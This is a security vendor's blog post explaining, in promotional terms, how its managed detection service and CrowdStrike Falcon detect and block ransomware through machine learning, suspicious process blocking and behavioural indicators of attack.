With the May 2021 attack on Colonial Pipeline nabbing hacking group DarkSide $5 Million dollars in ransom money, and a global rise in ransomware generally, many companies believe it’s not a matter of if but when they will be attacked. Some are anticipating ransom payments (despite warnings from the FBI), while others still believe that current technology or processes will prevent, or enable recovery from, these attacks within minutes or hours. Meanwhile, statistics show an average of 3 - 14 days recovery time. Couple that with fears of IT teams or security providers, that they are not equipped to deal with an adversary as sophisticated as Darkside, and many feel powerless to stop the menace of ransomware.
Much of our content educates and equips small to midsize enterprises (often without the resources required to combat these threats) with proactive measures to be taken across the full lifecycle of an attack, including how Managed Detection and Response (MDR) can help. But, an area we haven’t been specific on is what happens in the final critical stage of a ransomware attack: the encryption and exfiltration of data conducted by the ransomware itself.
In this blog post, I break down how we stop ransomware on your operating systems with our agent. I cover four specific tactics that disrupt ransomware, separate from the ongoing hygiene and hardening regimes we offer our customers. Finally, whether it’s that of a security provider, or constructed internally, having an efficient Security Operations Center (SOC) behind these techniques is critical in your efforts to deter hackers. For more on a truly efficient SOC, check out my colleague’s blog here. And, for how to stop the attacker beyond ransomware on the endpoint, , check out our white papers: The Rise of Ransomware as a Service, or Testing and Validating the Maturity of Security Programs.
What do we use to stop Ransomware?
ActZero uses multiple tools on the endpoint, and off of it. We forward CrowdStrike’s NGAV and EDR logs to our cloud which then finds anomalies by leveraging machine learning (ML) models. Native to the EDR are a number of detections that, while not specific to ransomware, do a great job of preventing nasty stuff from launching on your endpoint in the first place (including ransomware). Some notable ones are: Drive-by Download LOTL protection via Suspicious Processes Blocking, Suspicious Script and Command Blocking, Suspicious Registry Operation Blocking and Code Injection Blocking.
So, let’s tackle the multiple ways these tools find and stop Ransomware with different detection techniques and responses. First off, CrowdStrike Falcon (which every client using the ActZero service has a native install of) provides automated ransomware prevention using a few different detection techniques which work independently, to achieve redundancy and a multifaceted approach to the problem. I’ll explore each of them below in the context of the known unknowns of ransomware.
Ransomware changes (like other “polymorphic malware”) in predictable ways to bypass detection. For example, virtually all Ransomware variants will change the properties of files or languages used, to script attacks to bypass traditional antivirus (AV). The examples below show how On-Sensor ML, Cloud-Based ML, Suspicious Process Blocking and Indicators of Attack (IoA) work together to block these types of changes, and enable AV remain effective:
On-sensor Machine Learning
When systems are not connected to the internet, Falcon can still protect against Ransomware variants and other threats via the On-Sensor Machine Learning engine. This uses pattern detection technology which can identify Ransomware even when the file type is changed, or when the attack is completely fileless (and delivered via processes, or suspicious scripts (eg, PowerShell). This tactic also prevents Zero-Day editions where properties are changed to bypass signature detection. Check out our demonstration here. This avoids the “round-trip time” to and from the cloud for analysis, so you can block Ransomware even if it was mounted with a USB, on an endpoint without an Internet connection.
Cloud-Based Machine Learning
The broadest and easiest way to prevent ransomware like Darkside, GrandCrab and Wannacry (some of the most prolific malware campaigns in North America) is by using Machine Learning. These algorithms predict negative outcomes based on EDR data similar to on-sensor (local) algorithms but have much more compute to run detections/models. The cloud-based ML models operate together with those on the machine, but require data to be forwarded to identify if the malware (or the activity) is malicious before a command or policy is automatically updated to block it. While this round-trip and algorithms are used across CrowdStrike’s data set globally to identify new threats, the speed and automation of this process typically returns actions in less than a minute, impressive when combined with the immediacy of detection, and corresponding response, from the local sensor.
Suspicious Process Blocking
Suspicious Process Blocking identifies the processes associated with variants of ransomware (such as scripts, like PowerShell, or even vbscript running in Word (in which case Word itself is the process)) as suspicious and blocks them. This can sometimes be referred to as Exploit Blocking which examines the techniques typically used in an exploit to take more control over the operating system by exploiting its flaws.
Finally, most ransomware has some predictable behavior. We use this detection type to our advantage and provide protection capabilities in addition to machine learning. Sometimes referred to as Indicators of Attack (IoA) these focus on what actions are being taken and prevent them. For example, many ransomware programs will steal credentials, delete your local backups and of course change a high number of files substantially and then quickly write a note demanding bitcoin. Additionally, it doesn’t matter if the source is a process, script or other automated programs the behavior or action taken will present the same. This type of behavior-based policy is how the ActZero ML also compliments CrowdStrike for broader detections beyond those that come “off the shelf” with Falcon.
I hope you’ve seen how these four tactics can help to block ransomware, and why machine learning is necessary to power them. To see these detections in action, you can request a demo of the service in action. Or, if you would like to understand more about the strategies behind our machine learning algorithms, we detail them on our website, here. Finally, if you want to learn more about the plight of ransomware itself, check out our white paper The Rise of Ransomware-as-a-Service.